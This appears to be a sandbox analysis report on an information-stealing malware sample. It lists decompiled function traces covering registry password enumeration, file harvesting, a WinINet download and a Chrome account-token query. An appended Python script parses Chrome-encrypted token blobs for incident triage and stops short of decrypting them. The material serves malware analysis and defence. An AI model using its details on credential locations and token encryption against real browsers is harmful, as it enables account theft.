                                                          • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                          • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                          • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                          • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                          • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                          • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                        • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                        • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                        • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                        • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                        • task.LIBCPMTD ref: 004076FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                        • String ID: :
                                                        • API String ID: 3191641157-3653984579
                                                        • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                        • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                        • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                        • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                        APIs
                                                        • lstrcpy.KERNEL32(?,?), ref: 00B31642
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                          • Part of subcall function 00B394C7: StrStrA.SHLWAPI(?,?), ref: 00B394D3
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B3167E
                                                          • Part of subcall function 00B394C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 00B394F7
                                                          • Part of subcall function 00B394C7: lstrlen.KERNEL32(?), ref: 00B3950E
                                                          • Part of subcall function 00B394C7: wsprintfA.USER32 ref: 00B3952E
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B316C6
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B3170E
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B31755
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B3179D
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B317E5
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B3182C
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B31874
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                        • strtok_s.MSVCRT ref: 00B319B7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                        • String ID:
                                                        • API String ID: 4276352425-0
                                                        • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                        • Instruction ID: de17bcf454e56c29d618321a6b91162f9b464dfa252976e1e288600326079dfd
                                                        • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                        • Instruction Fuzzy Hash: 5971A3B2940118ABCB14FBB4DC89EEE73B9AF65300F2049D8F14DA2151EE759B84CF61
                                                        APIs
                                                        • memset.MSVCRT ref: 00407314
                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                        • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                          • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                        • task.LIBCPMTD ref: 00407555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                        • String ID: Password
                                                        • API String ID: 2698061284-3434357891
                                                        • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                        • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                        • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                        • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                        APIs
                                                        • lstrcatA.KERNEL32(?,00829FC0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                        • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                        • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                        • lstrcatA.KERNEL32(?,007F7880), ref: 00414847
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                        • lstrcatA.KERNEL32(?,0082A8D0), ref: 0041486F
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                          • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                          • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                          • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                          • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                        • String ID: 0aA
                                                        • API String ID: 167551676-2786531170
                                                        • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                        • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                        • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                        • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00829B70,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00829B70,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                        • __aulldiv.LIBCMT ref: 00418172
                                                        • __aulldiv.LIBCMT ref: 00418180
                                                        • wsprintfA.USER32 ref: 004181AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                        • String ID: %d MB$@
                                                        • API String ID: 2886426298-3474575989
                                                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                          • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                          • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 00B26376
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B263AE
                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B263F6
                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B2641A
                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00B26443
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B26471
                                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00B264B0
                                                        • InternetCloseHandle.WININET(?), ref: 00B264BA
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B264C7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 4287319946-0
                                                        • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                        • Instruction ID: 17c10dc79e0c2974e9733b0d6e187607687e7ef9068650737aafaaa5f5b33aca
                                                        • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                        • Instruction Fuzzy Hash: 765152B5940218AFDB20EF90DC45BEE77B9EB44701F1080D8F649A72C0DB746A85CF95
                                                        APIs
                                                        • memset.MSVCRT ref: 00B34FEE
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B35017
                                                        • lstrcat.KERNEL32(?,00421000), ref: 00B35034
                                                          • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34B93
                                                          • Part of subcall function 00B34B77: FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                        • memset.MSVCRT ref: 00B3507A
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B350A3
                                                        • lstrcat.KERNEL32(?,00421020), ref: 00B350C0
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                          • Part of subcall function 00B34B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                          • Part of subcall function 00B34B77: FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                        • memset.MSVCRT ref: 00B35106
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3512F
                                                        • lstrcat.KERNEL32(?,00421038), ref: 00B3514C
                                                          • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34C17
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00B34C2C
                                                          • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34C49
                                                          • Part of subcall function 00B34B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00B34C85
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,0064A524), ref: 00B34CB1
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,00420FF8), ref: 00B34CC3
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,?), ref: 00B34CD7
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,00420FFC), ref: 00B34CE9
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,?), ref: 00B34CFD
                                                          • Part of subcall function 00B34B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00B34D13
                                                          • Part of subcall function 00B34B77: DeleteFileA.KERNEL32(?), ref: 00B34D98
                                                        • memset.MSVCRT ref: 00B35192
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID:
                                                        • API String ID: 4017274736-0
                                                        • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                        • Instruction ID: 0d468eea5b52cb56e3775011ab45deef1c93e9183d8ce058407912b590eb2e9f
                                                        • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                        • Instruction Fuzzy Hash: 5C41D579A4021467C714F7B0EC47FD97778AF25701F5044D4B689660D1EEB897C88B92
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 00B38397
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B3839E
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B383BF
                                                        • __aulldiv.LIBCMT ref: 00B383D9
                                                        • __aulldiv.LIBCMT ref: 00B383E7
                                                        • wsprintfA.USER32 ref: 00B38413
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                        • String ID: @
                                                        • API String ID: 2774356765-2766056989
                                                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction ID: a41ea1299fbf37b94a7d6dc89ea32a35f9b86d435cfaf73fdfcf0350893b4112
                                                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction Fuzzy Hash: FC214AB1E44318ABDB00DFD4DC49FAEBBB9FB44B04F204649F605BB680C77869008BA5
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                        • API String ID: 1440504306-1079375795
                                                        • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                        • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                        • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                        • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess$DefaultLangUser
                                                        • String ID: B
                                                        • API String ID: 1494266314-2248957098
                                                        • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                        • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                        • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                        • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                        APIs
                                                        • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                        • memset.MSVCRT ref: 00409EE8
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                        • API String ID: 1977917189-1096346117
                                                        • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                        • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                        • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                        • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
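The two function entries above belong together: the first runs `SELECT service, encrypted_token FROM token_service` (the table in Chrome's "Web Data" database that holds Google account refresh tokens, whose rows Chrome names with an `AccountId-` prefix, which is what the `StrStrA(..., "AccountId")` call looks for), and the second does a 3-byte `memcmp` against `"v10"` and `"v20"`, the version prefix Chrome's OSCrypt puts in front of every encrypted value on Windows. The following Python is an added example, not the sample's code and not Joe Sandbox output: it builds a constructed stand-in for that table (table and column names are Chrome's; every token value and account id is made up here), runs the query recorded in the report, and splits each blob into prefix, nonce, ciphertext and tag so an incident responder can tell which tokens were protected only by the Local State key (`v10`) and which by app-bound encryption (`v20`). Decryption is deliberately left out; what the sample does on the `v20` path is not established by the report.

```python
import sqlite3
from dataclasses import dataclass

# On-disk layout of a Chrome/Chromium OSCrypt value on Windows (Chrome's format, not taken from the report):
#   b"v10" | 12-byte AES-256-GCM nonce | ciphertext | 16-byte GCM tag
# "v10": key is os_crypt.encrypted_key from Local State, itself DPAPI-protected in the user's scope
# "v20": same layout, but the key is app-bound (Chrome 127+) and only released through Chrome's
#        elevation service, so the Local State key no longer decrypts it
# no prefix: pre-v80 legacy value, the whole blob goes straight to CryptUnprotectData
NONCE_LEN = 12
TAG_LEN = 16
KNOWN_PREFIXES = {b"v10": "local-state-key", b"v20": "app-bound-key"}


@dataclass
class ParsedBlob:
    scheme: str          # "local-state-key", "app-bound-key" or "dpapi-legacy"
    nonce: bytes         # empty for the legacy scheme
    ciphertext: bytes
    tag: bytes           # empty for the legacy scheme


def parse_oscrypt_blob(blob: bytes) -> ParsedBlob:
    """Split an encrypted_token value into its parts; mirrors the 3-byte memcmp the sample performs."""
    scheme = KNOWN_PREFIXES.get(blob[:3])
    if scheme is None:
        return ParsedBlob("dpapi-legacy", b"", blob, b"")
    body = blob[3:]
    if len(body) < NONCE_LEN + TAG_LEN:
        raise ValueError("truncated %s blob: %d bytes after prefix" % (blob[:3].decode(), len(body)))
    return ParsedBlob(scheme, body[:NONCE_LEN], body[NONCE_LEN:-TAG_LEN], body[-TAG_LEN:])


def build_sample_webdata(path: str = ":memory:") -> sqlite3.Connection:
    """Constructed stand-in for the token_service table of Chrome's "Web Data" database.

    Table and column names are Chrome's (they appear verbatim in the sample's query) and the
    AccountId- naming follows Chrome; the account ids and token bytes are made up for this example.
    """
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE token_service (service VARCHAR PRIMARY KEY NOT NULL, encrypted_token BLOB)")
    dpapi_header = b"\x01\x00\x00\x00\xd0\x8c\x9d\xdf\x01\x15\xd1\x11\x8c\x7a\x00\xc0\x4f\xc2\x97\xeb"
    rows = [
        ("AccountId-1111", b"v10" + bytes(range(12)) + b"\xaa" * 40 + b"\xbb" * 16),
        ("AccountId-2222", b"v20" + bytes(range(12)) + b"\xcc" * 20 + b"\xdd" * 16),
        ("AccountId-3333", dpapi_header + b"\x00" * 24),
    ]
    conn.executemany("INSERT INTO token_service VALUES (?, ?)", rows)
    conn.commit()
    return conn


def triage_token_service(conn: sqlite3.Connection) -> dict:
    """Run the exact query recorded in the report and classify every token by encryption scheme.

    Returns {service: scheme}. For incident response this tells you which account tokens were
    recoverable with the Local State key alone (v10) and which sit behind app-bound encryption (v20).
    """
    result = {}
    for service, token in conn.execute("SELECT service, encrypted_token FROM token_service"):
        result[service] = parse_oscrypt_blob(bytes(token)).scheme
    return result


if __name__ == "__main__":
    conn = build_sample_webdata()
    for service, scheme in triage_token_service(conn).items():
        print("%-16s %s" % (service, scheme))
```

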